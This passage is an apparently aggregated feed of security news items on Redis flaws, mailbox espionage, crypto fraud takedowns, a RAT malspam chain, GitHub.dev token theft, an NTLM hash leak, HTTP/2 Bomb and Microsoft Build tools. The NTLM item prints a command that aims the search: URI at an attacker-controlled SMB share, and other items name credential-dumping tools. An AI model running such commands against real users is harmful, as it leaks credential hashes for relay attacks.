Prioritize internet-exposed instances, shared application credentials, and any role that combines CONFIG, scripting, and stream access. Rotate any broadly shared Redis credentials while you are at it.

CVE-2026-23479 was one of five RCE-class Redis flaws disclosed last month, and it follows Redis's 2025 RediShell flaw, another authenticated use-after-free involving Lua scripting. It is also the one an AI tool caught. Two commits planted it, two years hid it, and it sat in one of the most-deployed databases around until a hacking contest surfaced it. Code review never did.

from The Hacker News https://ift.tt/Vu8MnJj
via IFTTT

Hackers Spied on a Stock Exchange Executive's Outlook Mailbox for Five Months

Unknown attackers spent at least five months inside the Outlook mailbox of a senior executive at a major global stock exchange, copying the inbox out in small, repeated batches and routing it through Dropbox and OneDrive so the traffic blended into normal cloud activity.

Symantec and Carbon Black's Threat Hunter Team reported the campaign this week. This points to espionage, not a money grab: Symantec said the commands indicate intelligence collection, not theft for profit.

Neither the executive nor the exchange was named. The value is plain enough: an exchange executive's inbox can hold non-public listing details, enforcement matters, deal terms, market-moving plans, plus the executive's calendar and contacts.

Five months of quiet access handed the attacker a detailed read on the executive's dealings and where the organization was heading, without needing broad access to other business systems.

The first malicious activity showed up on October 10, 2025. By then, the attacker was already running two binaries as SYSTEM, the highest Windows privilege level, one faking Adobe's updater and the other faking OneDrive. By the time defenders noticed anything, the intruder had full control of the machine, and how they first got in is still unknown.

However, Symantec confirmed that the first signs likely came from lateral movement off a previously compromised device. The operation kicked into gear on November 12. The attacker pulled a Dropbox API token, started uploading data with curl, and deployed the main tool: a mailbox stealer built on Aspose, a legitimate .NET library that reads Outlook OST and PST files. Wrapped in an executable, it converted the mailbox to PST and wrote it to disk, run each time with a password and a date-range flag.

The first run grabbed everything from August 2025 on. After that the attacker came back every two to four weeks, each run taking only the days since the last one, eight more pulls through February 17, 2026. The result is a near-continuous copy of the mailbox, sliced thin enough not to draw attention from security software.

The stealth came from making the work look ordinary. Scheduled tasks posed as Adobe, Lenovo and OneDrive system services. For exfiltration the attacker used Dropbox and OneDrive Personal, and for OneDrive they connected to hard-coded Microsoft IP addresses instead of the onedrive.live.com hostname, so there were no DNS lookups for a perimeter tool to catch or block.

The attacker also tested the public file host temp.sh once in November, then dropped it. The last observed activity, on March 19, 2026, was a new backdoor that was staged but never run, which Elias said may mean the attacker lost access soon after.

Symantec's published indicators point to a wider intrusion kit, not just a mailbox grabber: FRPC for tunneling traffic out, Secretsdump for pulling Windows credentials, SharpDecryptPwd for recovering saved app passwords, and a tool to bypass Windows User Account Control. The report does not say how each was used here, and none of them point to a specific group.

There is no CVE in this story. It was an intrusion against a person's mailbox, not the exploitation of a freshly disclosed flaw, which is part of why it is worth reading: no patch closes this, and the burden shifts to monitoring and response.

Attribution is unresolved too. The mix of public tooling and consumer cloud services left little to tie the activity to a known actor, and that stays open until a stronger source says otherwise. Routing exfiltration through Dropbox and OneDrive to blend in is a well-worn play, and one Microsoft has flagged as a deliberate way to slip past perimeter defenses and muddy attribution.

If you defend an exchange, a regulator, or any firm sitting on market-moving information, feed the hashes in now and watch for the behavior behind them: unusual mailbox export activity, odd Outlook access, uploads to personal Dropbox or OneDrive accounts, unexpected tunneling, and credential-dumping on systems tied to privileged users.

from The Hacker News https://ift.tt/1ZXAMoR
via IFTTT

DoJ Disrupts Southeast Asia Crypto Fraud Networks, Freezes $3.8 Million in Assets

The U.S. Department of Justice (DoJ) on Wednesday announced the results of a sweeping action undertaken by government authorities and private sector companies to combat cyber-enabled and cryptocurrency fraud targeting Americans.

The "Disruption Week" operation began May 18, 2026, leading to the takedown of millions of social media, email, and internet access accounts used by transnational cybercrime groups in Southeast Asia to defraud victims. Private sector entities voluntarily froze over $3.8 million in cryptocurrency involved in the laundering of funds stolen from Americans.

"Cyber-enabled and crypto investment fraud is devastating Main Street Americans, wiping out life savings and preying on some of our most vulnerable citizens," said U.S. Attorney Jeanine Ferris Pirro for the District of Columbia.

The efforts are part of an ongoing U.S. government initiative called Scam Center Strike Force, which aims to dismantle transnational criminal organizations running cyber-enabled fraud and "pig butchering" (aka romance baiting) scams from compounds in Southeast Asia, along with the human trafficking and money laundering operations that fuel the illicit enterprise.

These schemes typically involve cultivating relationships with prospective victims over time before they are coaxed into depositing funds into fraudulent investment platforms under the promise of high returns. Once the assets are deposited, they are routed to accounts under the scammers' control. Once the victim runs out of money or discovers the fraud, the criminals cease contact with them.

Participating in the operation were Apple, Coinbase, Google, Meta, Microsoft, Silent Push, SpaceX/Starlink, TRM Labs, and Zenlayer, alongside the Australian Federal Police, Canadian Anti-Fraud Centre, New Zealand Police, the Royal Thai Police, and U.K. National Crime Agency.

The "first-of-its-kind event" has resulted in a series of actions -

• Disruptions of criminal activity across more than 1.4 million accounts, pages and groups across Facebook and Instagram, 20,000 Microsoft accounts, and thousands of Starlink kits;
• Interruptions of malicious IP address traffic and of network connections hosted by scammers;
• Decommissioning of servers, colocation environments, and hosting infrastructure linked to scam networks operating across Southeast Asia;
• Identification of multiple scammers and scam platforms, and referrals of the same to U.S. authorities for investigation and possible prosecution; and
• Arrests of seven scammers in Thailand and the opening of new cases by the Royal Thai Police Anti-Cyber Scam Center.

According to the DoJ, cryptocurrency investment scams have emerged as one of the "fastest growing and most financially devastating forms of fraud" targeting Americans, with reported losses from these scams rising from $3.96 billion in 2023 to $5.8 billion in 2024 and to more than $7.2 billion in 2025, registering a 24% increase year-over-year.

"Many of these schemes are run out of industrial-scale compounds in Cambodia, Laos, and in Burma along the border with Thailand," the DoJ said. "Criminal syndicates often lure workers to Thailand with promises of high-paying technical jobs, then seize their identification documents and traffic them to work in scam compounds."

"Within the compounds, trafficked workers are frequently forced to conduct fraud operations against victims in the United States and elsewhere under threat of violence."

Last month, a joint international operation involving U.S. and Chinese authorities arrested at least 276 suspects and shut down nine scam centers used for cryptocurrency investment fraud schemes targeting Americans.

In a coordinated statement, Meta said law enforcement has arrested 63 potential criminals connected to scam centers thus far, with Coinbase freezing over $3 million in cryptocurrency assets tied to criminal networks.

"Transnational online fraud cannot be solved by any single agency or country acting alone, which is why strong collaboration and timely information sharing remain essential to dismantling these networks and protecting the public," Police Lieutenant General Jirabhop Bhuridej, Royal Thai Police, said.

from The Hacker News https://ift.tt/32uGIHx
via IFTTT

Google DoubleClick Abused in New Malspam Campaign to Deliver DesckVB RAT

Cybersecurity researchers have flagged a new malspam campaign that makes use of Google's DoubleClick domain as a way to evade detection and ultimately deliver a remote access trojan (RAT) named DesckVB RAT.

"Before the victim ever reaches attacker-controlled infrastructure, the lure routes through DoubleClick, a legitimate Google-owned domain that many security tools are less likely to treat as suspicious," Huntress researchers Anna Pham and Adam Mooney said in a report shared with The Hacker News.

"From there, the victim is passed into a malspam kit that personalizes itself on the fly using the victim's email address, dynamically pulling in company branding and location details to make the page feel convincing without requiring the operators to handcraft a lure for each target."

What makes this attack noteworthy is that it eliminates the need for having a bespoke kit for each targeted organization, thereby making these operations more scalable and cost-effective. The end goal of the campaign is to drop DesckVB RAT, a .NET-based trojan that has been active in the wild since February 2026.

The attack begins when an unsuspecting user opens an HTML file that's attached to a phishing email. The file triggers a meta-refresh browser redirect to a Google DoubleClick Campaign Manager click-tracking URL, from where the user is steered to another redirector, which decodes the Base64-encoded email address and leads the victim to a landing page containing a "Download PDF" button.

Clicking the button causes the server to respond with a ZIP archive that initiates the rest of the infection chain. This is achieved by means of a JavaScript loader, whose main responsibility is to retrieve and execute a .NET RAT while flying under the radar. The script extracts and runs a PowerShell script, which then fetches a .NET loader from an external server.

The loader acts as a stager that verifies it's not being analyzed, neutralizes the machine's security controls, sets up persistence, and then ultimately downloads and runs the RAT payload by using a technique called process hollowing that involves injecting the malware into Microsoft-signed processes.

Once launched, the trojan communicates with a command-and-control (C2) server over raw TCP sockets, carries out system reconnaissance, and configures Microsoft Defender exclusions. The trojan also patches Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) at the native API level at the outset in an effort to blind Windows telemetry before persistence is established on the host by setting up Run and RunOnce Registry entries, along with placing a loader responsible for launching the RAT in the user's Startup folder.

The malware comes with capabilities to extract data, run commands, and deploy additional payloads, granting the attackers full control over the infected machines, while simultaneously taking steps to fly under the radar by terminating and rebooting the machine if it detects an analysis tool or determines that it's running in a sandboxed environment.

"This is a strong reminder of why defence in depth matters," Huntress said. "Configuring a Group Policy Object (GPO) in Active Directory to force script files such as .vbs, .hta, and .js to open in Notepad by default can stop a threat actor at the very first stage, preventing additional payloads from ever being dropped."

"On the email security front, organizations should consider deploying DMARC, DKIM, and SPF records to reduce the likelihood of spoofed or malicious emails reaching end users. Beyond that, an email gateway solution capable of sandboxing attachments and links before delivery adds another meaningful layer of protection."

from The Hacker News https://ift.tt/278XJcY
via IFTTT

One-Click GitHub Dev Attack Lets Attackers Steal Full GitHub OAuth Tokens

Cybersecurity researchers have disclosed a one-click attack via Microsoft Visual Studio Code (VS Code) that makes it possible to steal a user's GitHub token.

"Just by clicking a link, it's possible for an attacker to steal a GitHub token that can read and write to your repos, including private ones," security researcher Ammar Askar said.

GitHub supports a feature called GitHub.dev that runs as a lightweight web-based source code editor in the web browser's sandbox by launching a VS Code environment. It allows users to send pull requests and make commits.

"This functionality is achieved by github.com POSTing over an OAuth token to github.dev that allows it to interact with GitHub on your behalf," Askar said. "The token is not scoped to the particular repo you interacted with, meaning it has full access to every other repo that you have access to."

In a nutshell, the vulnerability allows attackers to install malicious VS Code extensions that steal GitHub OAuth tokens when they are passed to GitHub.dev by exploiting a message-passing mechanism between the main VS Code window and webviews. Webviews are used to render Markdown previews or edit Jupyter notebooks.

Specifically, the exploit runs malicious JavaScript inside an untrusted webview to simulate keypresses (aka keydown events) in the main editor window, open the Command Palette by triggering "Ctrl+Shift+P," and install an attacker-controlled extension that extracts the GitHub OAuth token sent to GitHub.dev and queries the GitHub API to enumerate all private repositories the victim can access.

It's worth noting the approach also leverages a VS Code feature called local workspace extensions that allows an extension to be directly installed without presenting any additional trust dialog prompt as long as it's placed in the ".vscode/extensions" folder within that workspace, effectively bypassing the publisher trust check.

"This is just a small hiccup though, one of the things that extensions can do as part of their package.json is to contribute extra keybindings to VS Code," the researcher explained. "Since we can reliably trigger keybindings, we can just add a keybind for whatever VS Code command we want, such as installing an extension while skipping the trusted publisher check."

The researcher also noted GitHub was notified of the vulnerability on June 2, 2026, an hour after which details of the issue were made public knowledge, citing Microsoft's handling of VS Code-related bugs in the past. As of writing, Microsoft has acknowledged the vulnerability and noted that it's working on a fix.

"To clarify, this issue does not affect VS Code Desktop," Alexandru Dima, a partner software engineering manager at Microsoft, said.

from The Hacker News https://ift.tt/jL6rAFp
via IFTTT

Beyond the Zero-Day: See Your Network Like an Attacker | Webinar with HD Moore

Assume the breach. Zero-days keep shipping, AI is writing exploits faster than anyone patches, and "patch everything in time" stopped working years ago. Stop betting the org on winning that race. You don't control which bug lands. You control what it can reach once it does.

That is a question about the shape of your network, and most teams have the shape wrong. HD Moore, creator of Metasploit and now CEO of runZero, spends the session showing you that shape from the attacker's side.

Save your seat for a LIVE session, or register, and we will send you the recording.

The segmentation you think you have

The comfortable assumption: critical systems sit behind a firewall or off on their own segment, so a foothold over here cannot become a disaster over there. Call it the segmentation illusion. It holds until someone maps the network for real.

Then the seams show up. A device wired into two networks at once, quietly bridging the zones you meant to keep apart. Connected gear nobody registered, answering on a segment it should not be on. Whole sets of machines hiding behind an industrial protocol gateway, invisible to your scanner, reachable by anyone who knows the gateway is there. None of it is on the asset list. All of it routes around the control you were counting on.

Inventory is a list. Attackers read a map.

You keep an inventory, a static list of things you own. An attacker does not care about your list. They care about paths: how one foothold reaches the next, until it lands on something that hurts. The two views rarely match, and the difference is exactly the part of your network you cannot see and they can. Moore built Metasploit, the framework half the industry learned offense on, and now runs the company whose whole job is finding the assets and connections organizations don't know they have.

Grab your spot and see that view turned on your own environment.

What you leave able to do

• Find the assets you don't know you have. Unsanctioned IT, shadow IoT, and the sub-assets behind OT protocol gateways where your scans never look.
• Find the bridges that break segmentation. The multi-homed devices and forgotten assets connecting zones you believed were isolated.
• See the paths, not just the parts. Trade static inventory for live attack-path mapping that shows how a foothold actually travels.
• Fix the few things that matter. Focus remediation on the assets and links that shorten an attacker's route to impact.

Corporate network, factory floor, or both tangled together: if IT, IoT, and OT share your environment, the seams between them are where this goes wrong. See your network the way an attacker already does, before they do.

Register now. Can't make it live? Sign up anyway, and we will send the recording.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.

from The Hacker News https://ift.tt/MsQ5lhu
via IFTTT

Unpatched Windows Search URI Vulnerability Lets Attackers Steal NTLMv2 Hashes

Cybersecurity researchers have disclosed details of an unpatched issue that could be exploited to disclose a user's NTLMv2 hash to the attacker.

Like in the case of CVE-2026-33829, which impacted the Windows Snipping Tool's ms-screensketch: URI handler, the newly flagged issue resides in the search: URI handler, per Huntress.

CVE-2026-33829 refers to a spoofing vulnerability that could expose sensitive information to an unauthorized actor. It was patched by Microsoft in April 2026.

"An attacker could induce the user into clicking a specially crafted link in a Web browser or other URL source, by embedding it in a Web page or email message," Microsoft noted in its advisory at the time.

"If the user approves the launching of the link, the crafted URL can induce the computer to connect to an SMB server of the attacker's choosing, which would disclose the user's NTLMv2 hash to the attacker, who could use this to authenticate as the user."

Specifically, the problem had to do with the fact that the Snipping Tool's URI handler accepted a "filePath" parameter, failed to validate it, and would reach out to any Universal Naming Convention (UNC) path passed to it. This, in turn, could trigger NTLM authentication and expose the victim's Net-NTLMv2 hash to the attacker.

The newly discovered shortcoming achieves the same end goal using "search:" and "crumb=location:" instead of "filePath" using a command like below -

start "" "search:query=test&crumb=location:\\10.0.1.100\share"

"It used the same NTLM leakage mechanism, produced the same Net-NTLMv2 leak, had the same prerequisites, and carried the same Moderate rating," Huntress researcher Andrew Schwartz said. It's worth noting that the use of a "crumb" parameter to steal the hash (CVE-2023-35636) was documented by Varonis in February 2024.

As a result, a threat actor could leverage the captured hash to conduct relay attacks and gain deeper access into a network. Following responsible disclosure on April 15, 2026, Microsoft declined to address the issue, stating "only Important and Critical severity cases meet our bar for servicing."

In the absence of a fix, it's advised to block outbound SMB (TCP/445 and TCP/139) on hosts that don't need it, enforce SMB signing so that captured hashes can't be relayed against internal services, and disable NTLM where applicable.

from The Hacker News https://ift.tt/BtFhM4w
via IFTTT

New HTTP/2 Bomb Vulnerability Allows Remote DoS on NGINX, Apache, IIS, Envoy & Cloudflare

Cybersecurity researchers have discovered a remote denial-of-service exploit that affects major web servers, including NGINX, Apache HTTPD, Microsoft IIS, Envoy, and Cloudflare Pingora.

The vulnerability has been codenamed HTTP/2 Bomb by Calif.

"The vulnerable behavior exists in each server's default HTTP/2 configuration," the company said, adding it was discovered by OpenAI Codex by chaining together two known techniques: a compression bomb and a Slowloris-style hold.

"The bomb targets HPACK, HTTP/2's header compression scheme: one byte on the wire becomes one full header allocation on the server, repeated thousands of times per request," Calif added. "The hold is a zero-byte flow-control window that keeps the server from ever freeing any of it."

HPACK is a dedicated header compression algorithm for HTTP/2 used for compressing request and response metadata using Huffman encoding that results in an average reduction of 30% in header size. It's also designed to be resilient to attacks like CRIME (short for "Compression Ratio Info-leak Made Easy") that can leak authentication cookies from compressed headers.

Slowloris, on the other hand, is a type of denial-of-service (DoS) attack that allows a threat actor to overwhelm a targeted server by opening and maintaining many simultaneous HTTP connections between the attacker and the target. It is an application-layer attack.

HTTP/2 Bomb is inspired by various known approaches like HPACK Bomb (aka CVE-2016-6581), which was first disclosed in 2016, as well as CVE-2025-53020, a memory exhaustion vulnerability in Apache httpd's HTTP/2 implementation, and two DoS flaws in Apache HTTP Server via crafted CONTINUATION frames (CVE-2016-8740) and worker-thread starvation (CVE-2016-1546) in an HTTP/2 connection.

"What's new here is where the amplification comes from," Calif said. "The classic bomb stuffs a large value into the table and references it repeatedly, so servers learned to cap the total decoded header size. Our variant goes the other way: the header is nearly empty, and the amplification comes from the per-entry bookkeeping the server allocates around it. The decoded-size limit never fires because there's almost nothing to decode."

In a hypothetical attack scenario, a home computer on a 100Mbps connection has the potential to render a vulnerable server inaccessible within seconds. What's more, a single client can consume and hold 32GB of server memory against Apache HTTPD and Envoy in about 20 seconds.

To counter the vulnerability, it's advised to apply the following mitigations -

• NGINX - Upgrade to 1.29.8+, which adds the max_headers directive with a default of 1000. If upgrade is not an option, it's recommended to disable HTTP/2 with http2 off;.
• Apache HTTPD - Fixed in mod_http2 v2.0.41. If upgrade is not an option, it's recommended to set Protocols http/1.1 to disable HTTP/2.
• Microsoft IIS, Envoy, and Cloudflare Pingora - No patch available as of writing.

"The deeper miss is that the spec frames memory risk purely as an amplification ratio, and ratio is only half the equation," Calif said. "A 70:1 amplifier is harmless if the memory is freed when the request completes. It becomes an attack because HTTP/2 lets the client hold the connection open almost for free, pinning every allocated byte for as long as they like."

from The Hacker News https://ift.tt/3ag16Wt
via IFTTT

Microsoft Build 2026: Securing code, agents, and models across the development lifecycle

1. Secure your code
2. Secure your agents
3. Trust agents with your data
4. Secure your models
5. Trust starts with security

Today, developers and security teams are caught in growing tension. AI is accelerating development and introducing new issues around insecure code, opaque models, data exposure, and compliance. Add the challenges of shadow AI and tool sprawl and the result is a widening gap between innovation and control. As developers move faster, security teams struggle to keep up with visibility, governance, and oversight. The resulting friction across the development lifecycle is forcing a tradeoff between speed and safety that doesn’t need to exist. Security needs to move upstream to become part of how developers actually work: built into their day-to-day tools and connected to the tools security teams use.

At Microsoft Build 2026, we are announcing new security tools and capabilities to give developers clear guidance in real time, scale with the complexity of tasks, and provide security teams with a consistent view across the full lifecycle so innovation can move fast and securely without the business losing control. Learn more about our solutions to help secure your code, secure your agents, and secure your models.

Secure your code

Today’s headlines reflect the tension around the power of AI models and the potential threat they pose when used to find and exploit vulnerabilities. It is forcing a shift as security teams look for solutions to help them safely harness the power of these models. At the same time, developers want to use these same models to efficiently identify real, exploitable risk and remediate it within their flow of work. That’s why we developed the Microsoft Security multi-model agentic scanning harness (codename MDASH) and added native integration between Microsoft Defender and GitHub Code Security (part of the former GitHub Advanced Security suite) to help both security and developer teams identify and close gaps early.

Discover and validate exploitable vulnerabilities with codename MDASH

The new Microsoft Security multi-model agentic scanning harness (codename MDASH) is available in an expanded preview for eligible organizations and now includes integration with Microsoft Defender. This new agentic security system orchestrates a pipeline of more than 100 specialized AI agents using an ensemble of models to discover, validate, and prove exploitability across codebases written in popular programming languages.

This approach is unique in the industry. Our multi-model agentic scanning harness uses a configurable panel of models, ranging from state-of-the-art (SOTA) models as the heavy reasoners, to more cost-effective models for high-volume operations. This allows us to trade speed, recall, and cost, and minimize dependency on any specific model.

The combination of multiple models, hundreds of agents, and over 100 trillion signals a day helps identify real risk over theoretical noise, to help teams focus on what can be exploited. The strategic implication is clear: AI vulnerability discovery has crossed from research curiosity into production-grade defense at enterprise scale, and the durable advantage lies in the agentic system around the model rather than any single model itself. MDASH recently jumped roughly 10% in less than three weeks to a new CyberGym industry benchmark score of 96.55%.

“At Accenture, we’re always looking toward the next frontier in protecting our clients and our enterprise. What Microsoft is building with MDASH reflects a meaningful shift from reactive, rule-based scanning to agentic systems that can reason across complex codebases like a skilled security researcher,” says Kris Burkhardt, Chief Information Security Officer at Accenture. Accenture is one of a select group of Security partners and Microsoft Intelligent Security Association (MISA) members that are engaged in the preview to shape MDASH and accelerate agentic AI vulnerability discovery.

Our partner engagements reflect a shared focus on moving from reactive detection to proactive identification of exploitable risk. “We’re seeing cyber threats evolve rapidly, with AI accelerating both the scale and sophistication of attacks. Microsoft’s investment in MDASH reflects a strong commitment to helping organizations stay ahead of this curve. Based on our early discussions and exposure to the innovation, we see strong potential for MDASH to simplify and strengthen SecOps, helping organizations operate with greater resilience and confidence,” says Morgan Adamski, Principal and Deputy Platform Leader of Cyber, Data, and Tech Risk at PwC US.

Together, we are partnering across the industry to use leading models paired with our platforms and expertise to deliver protection at scale. Together, we are partnering across the industry to use leading models paired with our platforms and expertise to deliver protection at scale. “We’re excited to work with Microsoft on MDASH because it addresses one of the most pressing challenges our customers face: reducing the time between discovering a vulnerability and taking meaningful action. Microsoft’s role as a trusted security vendor matters here—customers need innovation, but they also need confidence, governance, and a partner they can rely on. Our early experience with MDASH has been encouraging, and we see real opportunity for it to help organizations modernize how they approach vulnerability discovery and remediation,” says Jason Rader, Insight CISO.  

Reach out to your Microsoft account representative for more information on the expanded preview of codename MDASH.

Prioritize and remediate code vulnerabilities with Microsoft Defender and GitHub Code Security

While codename MDASH identifies and validates what’s truly exploitable, the integration between Microsoft Defender and GitHub Code Security (part of the former GitHub Advanced Security suite), now generally available, brings runtime context into development and security workflows so that teams can prioritize and address risks early minimizing the impact to human resources. Vulnerabilities discovered in code are automatically enriched with real production signals, such as internet exposure and data sensitivity to inform prioritization. Developers can then remediate issues using AI-assisted fixes that are generated, assigned, and validated through GitHub Copilot Autofix and the GitHub Copilot cloud agent.

To support responsible, coordinated disclosure of findings that represent both real and potential vulnerabilities, role-based access controls ensure that only authorized individuals can view and act on them. Together, the production signal enrichment, AI-assisted remediation, and secure handling of findings within a single workflow help security and developer teams focus on real risk and enable teams to act quickly.

Learn more about agentic developer SecOps

Secure your agents

Agents are quickly becoming a new layer of the application stack. As developers build agents and move them into production, they need the tools to ship fast without sacrificing security, including built-in identity, governance, and safety testing. Security teams have overlapping needs: visibility into what’s running, control over what agents can access, and consistent governance across clouds and endpoints. Microsoft is delivering new solutions to help.

Build secure agents from day one

At Build 2026, Microsoft is introducing new capabilities to help developers build secure, enterprise-ready agents by default. With the general availability of the Agent 365 SDK, developers can integrate controls directly into their development workflows, bringing observability, access controls, and compliance enforcement into how agents are designed and deployed. This enables teams to build custom agents for any AI platform that are compliant, and enterprise-ready, and compose well with Agent 365.

Security extends beyond development and into how agents run. On Windows, the Microsoft Execution Container (MXC) SDK provides OS-level control over agent execution, giving developers and IT teams the ability to define containment and policy, applied by the OS through isolation technologies such as process and session isolation. Windows 365 for Agents, now generally available, enables you to run any agent in a fully isolated, policy-governed Cloud PC. Native Windows integration with Agent 365 provides a common foundation for observability, security, and governance, including built-in Intune capabilities to set policies that govern agent runtime execution and control how agents operate.

These new capabilities are now in early preview.

Observe, govern, and secure agents at scale with Agent 365—now including local agents

As agents proliferate across environments, gaining visibility and control over them becomes critical. Agent 365 introduces new capabilities to manage agent sprawl and risk, including an Agent 365 Agent Registry that surfaces unmanaged local agents discovered by Microsoft Defender, Microsoft Entra, and Microsoft Intune—all working together. The registry supports more than 20 types of local agents, including coding agents, AI desktop applications, and both local and remote Model Context Protocol (MCP) servers. From there, Intune policies can be used to block common execution methods for OpenClaw agents.

Security teams also need the ability to defend against emerging threats without slowing developer productivity. Microsoft Defender, Entra, and Intune work together to provide the visibility, runtime protections, and context needed to manage agent risk without slowing developer productivity. Defender enables analysts to investigate agent activity using advanced hunting and provides an exposure graph that helps teams understand how agents are connected across the network. Preview of these capabilities coming soon.

Protecting data is foundational to securing agents at scale. Microsoft Purview controls to prevent data exfiltration, Data Security Posture Management risk discovery, and agentic risk detection for coding agents Claude Code, GitHub Copilot, OpenAI Codex, and OpenClaw. This enables visibility on how local agents access sensitive data, runtime protections for risky prompts, and insights into unsafe agent behaviors. Microsoft Purview Audit also logs all agent activity for full traceability. Preview of these capabilities coming soon.

These capabilities are now in preview

Trust agents with your data

Developers also need direct, real-time insight into data security posture and risk signals associated with the agents they build. With Purview data risk signals embedded in the Foundry Control Plane, generally available, these signals provide guidance to developers on where to enforce protections before sensitive data is exposed. For example, Purview flags in real time when an agent surfaces sensitive financial data during testing and guides developers to mask or restrict access before deployment.

To further reduce risk, Purview introduces runtime data loss prevention (DLP) for agent prompts in Foundry, in preview with Agent 365. This capability detects, blocks, and audits sensitive data before it is processed by the agent, ensuring that sensitive information never reaches AI models.

Learn more about Microsoft Purview for developers

Secure your models

Before AI reaches production, teams need to verify that the models they depend on are safe. Now developers can inspect model artifacts, whether platform-native or bring-your-own, with Defender AI model scanning, in preview. To help close gaps early model Defender AI model scanning detects and blocks potentially vulnerable or compromised models across registries, workspaces, and CI/CD pipelines to verify model integrity before deployment.

Trust starts with security

There should never be a choice between innovation and safety.

The capabilities announced today span the full development lifecycle: discovering what’s exploitable, governing what’s running, protecting the data AI depends on, and verifying that agents behave as intended before they reach production. Microsoft security is embedded directly into the platforms and workflows developers already use, supporting innovation across Microsoft Foundry, Copilot Studio, GitHub, and open-source frameworks, and bringing discovery and governance to shadow AI.

But real progress in AI depends on more than breakthrough capabilities—it depends on whether organizations can trust the systems they are building and deploying. That is the common thread across the innovations announced at Build 2026 and the principle guiding our approach. Because the future of AI will belong not just to those who move fastest, but to those who can innovate with trust.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity. To learn more about how security is built into the Windows platform, explore the Windows Security book and Windows Server Security book.

The post Microsoft Build 2026: Securing code, agents, and models across the development lifecycle appeared first on Microsoft Security Blog.

from Microsoft Security Blog https://ift.tt/rAQ79bk
via IFTTT